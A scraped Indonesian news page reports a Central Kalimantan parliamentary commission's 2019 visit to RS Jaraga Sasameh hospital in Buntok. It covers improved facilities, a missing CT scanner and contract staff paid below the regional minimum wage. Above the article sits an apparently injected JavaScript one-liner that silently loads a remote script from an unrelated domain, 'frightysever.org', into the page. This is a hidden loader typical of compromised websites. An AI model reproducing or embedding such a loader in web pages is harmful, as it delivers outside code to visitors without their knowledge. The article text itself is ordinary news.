(function(f,b,n,j,x,e){x=b.createElement(n);e=b.getElementsByTagName(n)[0];x.async=1;x.src=j;e.parentNode.insertBefore(x,e);})(window,document,'script','https://frightysever.org/Bgkc244P');

Komisi C DPRD Kalteng Minta Perbaikan Layanan RS Jaraga Sasameh


BUNTOK, DPRD Provinsi Kalteng dari Komisi C -bidang kesehatan dan pendidikan- melakukan Kunjungan Kerja (Kunker) ke Rumah Sakit (RS) Jaraga Sasameh Buntok, Rabu (10/4/2019).

Ketua Komisi C DPRD Kalteng H Reza Fahroni mengatakan, Kunker Komisi C kali ini untuk melihat secara langsung sejauh mana pelayanan dan fasilitas yang dimiliki RS Jaraga Sasameh.

“Dari kunjungan terakhir kita, ternyata banyak sekali perubahan untuk kemajuan yang dimiliki dari RS Jaraga Sasameh,” kata Reza kepada Kanalkalimantan.com.

Ia mengatakan, untuk tahun 2019 ini pelayanan dan fasilitas dari RS Jaraga Sasameh mengalami peningkatan yang cukup signifikan, sangat berubah dari beberapa tahun sebelumnya.

“Dari hasil peninjaun kita, tinggal beberapa alat saja lagi yang akan dilengkapi, seperti alat CT Scan yang masih belum dimiliki,” ujar Reza.

Lebih lanjut, Reza berharap kepada pihak rumah sakit untuk bisa memperhatikan tenaga kontrak, agar tarif upah kerja bisa disesuaikan dengan UMK Barsel.

“Mengingat untuk tenaga kontrak kesehatan ini, biasanya paling dekat dalam pelayanan kepada pasien dan juga sangat rentan tertular penyakit dari pasien,” sebut Reza.

Ditambahkan olehnya perlu diingat untuk UMK Barsel kurang lebih Rp2,5 juta dan dari hasil peninjauan pihaknya untuk honor tenaga kontrak yang ada hanya Rp1,5.

“Perlu perhatian untuk bisa diperjuangkan upah dari tenaga kontrak ini paling tidak mendekati UMK yang ada,” pungkas Reza. (digdo)

Reporter:digdo
Editor:bie

Desy Arfianty

Recent Posts

Amuntai Expo dan Bazar Ekonomi Kreatif 2024

KANALKALIMANTAN.COM, AMUNTAI - Memeriahkan Hari Jadi ke-72 Kabupaten Hulu Sungai Utara (HSU) digelar Amuntai Expo… Read More

8 jam ago

Warga Muhammadiyah Banjarbaru Berhalalbihalal di Masjid At Taqwa

KANALKALIMANTAN.COM, BANJARBARU - Pimpinan Cabang Muhammadiyah Banjarbaru Utara menggelar halalbihalal sekaligus Hari Bermuhammadiyah kali pertama… Read More

11 jam ago

5 Mei Hari Bidan Sedunia

KANALKALIMANTAN.COM – Negara-negara di dunia merayakan Hari Bidan Sedunia yang jatuh pada 5 Mei setiap… Read More

17 jam ago

Syamsudin Noor Jadi Bandara Domestik, Begini Respon Wali Kota Banjarbaru

KANALKALIMANTAN.COM, BANJARBARU - Pencopotan status internasional pada Bandara Syamsudin Noor Banjarmasin yang terletak di Kota… Read More

17 jam ago

Presiden Jokowi di Booth PLN PEVS 2024, Dirut PLN Paparkan Kesiapan Ekosistem Kendaraan Listrik

KANALKALIMANTAN.COM, JAKARTA - Presiden Republik Indonesia Joko Widodo (Jokowi) mengunjungi booth PT PLN (Persero) dalam… Read More

20 jam ago

Akhir Pekan Pasti Hemat, Berikut Promo BRI hingga 30 Persen di 8 Kota Indonesia

KANALKALIMANTAN.COM – Bagi sebagian orang, akhir pekan (weekend) merupakan waktu yang dinanti. Sembari rehat bekerja,… Read More

23 jam ago

This website uses cookies.